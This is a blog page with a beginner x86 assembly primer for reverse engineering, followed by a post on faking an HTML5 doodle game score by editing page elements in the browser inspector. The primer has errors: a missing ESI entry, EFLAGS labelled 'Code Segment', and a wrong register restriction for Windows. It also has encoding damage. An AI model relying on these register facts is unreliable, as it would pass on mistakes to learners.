included in the MASM32v8 package, which includes other tools as well. You
can get it from here.

2. TASM ‚Äď Another popular assembler. Made by Borland but is still a
commercial product, so you can not get it for free.

3. NASM ‚Äď A free, open source assembler, which is also available for other
platforms. It is available at link. Note that
NASM can’t assemble most MASM programs and vice versa.

Basic Commands

There are soem commands to learn (very basic of course) this will help us to understand the reversed code easily in efficient
manner.

CPU registers

Registers are special memory locations on the CPU.
Assuming person is using computers x86 or later processors.

There are 8 32-bit general purpose registers.

The first 4, eax, ebx, ecx, and edx can also be accessed using 16 or 8-bit names.

ax gets the first 16 bits of eax, al gets the first 8 bits, and ah gets bits 9-16.
bx gets the first 16 bits of ebx.
The other registers can be accessed in a similar fashion.

We can use these registers for anything, although most have a special use:

Address Name Description

EAX Accumulator Register calculations for operations and results data

EBX Base Register pointer to data in the DS segment

ECX Count Register counter for string and loop operations

EDX Data Register input/output pointer

link Source Index source pointer for string operations

EDI Destination Index destination pointer for string operations

ESP Stack Pointer stack pointer, should not be used

EBP Base Pointer pointer to data on the stack

NOTE: In windows programming we may only use EAX,ECX and EDX registers

There are 6 16-bit segment registers. They define segments in memory:

Address Name Description

CS :Code Segment,instructions being executed are stored
DS, ES, FS, GS : Data Segment for data segment
SS :Stack Segment, to store the address of stack for the current program.

Two 32-bit registers that don’t fit anywhere:

Address Name Description

EFLAGS Code Segment status, control, and system flags

EIP Instruction Pointer offset for the next instruction to be executed

Basic Instruction Set:

There are a lot of other instructions other than these what I am going to tell you here.
WIll cover other instructions when we going to face them.

ADD: reg/memory, reg/memory/constant Adds the two operands and stores the result into the first operand. If there is a result with carry, it will be set in CF.

SUB: reg/memory, reg/memory/constant Subtracts the second operand from the first and stores the result in the first operand.

AND: reg/memory, reg/memory/constant Performs the bitwise logical AND operation on the operands and stores the result in the first operand.

OR: reg/memory, reg/memory/constant Performs the bitwise logical OR operation on the operands and stores the result in the first operand.

XOR: reg/memory, reg/memory/constant Performs the bitwise logical XOR operation on the operands and stores the result in the first operand. Note that you can not XOR two memory operands.

MUL: reg/memory Multiplies the operand with the Accumulator Register and
stores the result in the Accumulator Register.

DIV: reg/memory Divides the Accumulator Register by the operand and stores
the result in the Accumulator Register.

INC: reg/memory Increases the value of the operand by 1 and stores the result in
the operand.

DEC: reg/memory Decreases the value of the operand by 1 and stores the result
in the operand.

NEG: reg/memory Negates the operand and stores the result in the operand.

NOT: reg/memory Performs the bitwise logical NOT operation on the operand and
stores the result in the operand.

PUSH: reg/memory/constant Pushes the value of the operand on to the top of the stack.

POP: reg/memory Pops the value of the top item of the stack in to the operand.

MOV: reg/memory, reg/memory/constant Stores the second operand’s value in the first operand.

CMP: reg/memory, reg/memory/constant Subtracts the second operand from the first operand and sets the respective flags. Usually used in conjunction with a JMP, REP, etc.

JMP: label Jumps to label.

LEA: reg, memory Takes the offset part of the address of the second operand and
stores the result in the first operand.

CALL: subroutine Calls another procedure and leaves control to it until it returns.

RET: Returns to the caller.

INT: constant Calls the interrupt specified by the operand.

You can grab latest complete instruction set reference at:
link

Push and Pop

Push and Pop are operations that manipulate the stack.
Push takes a value and adds it on top of the stack. Pop takes the value at the top of the stack, removes it, and stores it
in the operand. Thus, the stack uses a Last In First Out (LIFO). Stacks are common data structures in computers.

This much is enough for now, If you have any question or if you find something wrong then do tell me.

HTML 5 and security

Leave a comment

Gaming is not just a mere time pass,it’s something much more than that.
Now people compete in gaming and there are prizes to be won, people use to spend money over gaming to keep their score more than others, even there are so dedicated gamers that use to play almost 24×7.
Working as an HTML 5 game developer with Mintango technologies and a security guy from passion I came up with this though this is something very common but still worth sharing.

I believe almost all of you know about recent google’s olympic special doodles, and some us are more interested in getting good score and getting all those 3 medal and then take a snapshot and paste it over Facebook.

If you are seeing some of your friend’s good score that doesn’t really mean that the person really scored that as if you know a little bit of HTML then it’s very easy to fake your score, I am taking about manipulating the score not Photoshop.

It’s as very simple just right-click over the doodle and click inspect element (I did this over google crome) and then it’s going to redirect you to the HTML code, now simply search for the numbers which represent your score and change it to what you need it to be.

20

to

999
change the value from 20 to 999
and this will be like

Image before changing anything

and now the medals change the class from class=”hplogo_smh” to class=”hplogo_smg”
and tada you got one of the best score.

Why I am telling this story?

Don’t you think it’s very easy, indeed it is. But the question is if this is that easy then is it worth creating some serious kind of games using HTML 5.
I am not a (superhero :P) flash guy but I know that it is that secure that we may create some serious kind of games with that, though companys like zapak and other some are creating games which use to record the final score and then they use to distribute prizes which attract gamers to log on into there site.

I am not saying that it have to be like castle but we need this to be secure, as anyone may easily manipulate the score or the content which we are sending on server which is used or the anlysis of our score and comaparision of players.

I must confess that I never tried this with some big game as for that I need official permission from the server owner, If you got one then I would love to do test over ūüôā

Will come up how to make things more secure and what changes we need to make serious gaming more serious.

conclusion:

it’s not that secure yet.

If ou have any questions then you may mail me or comment here.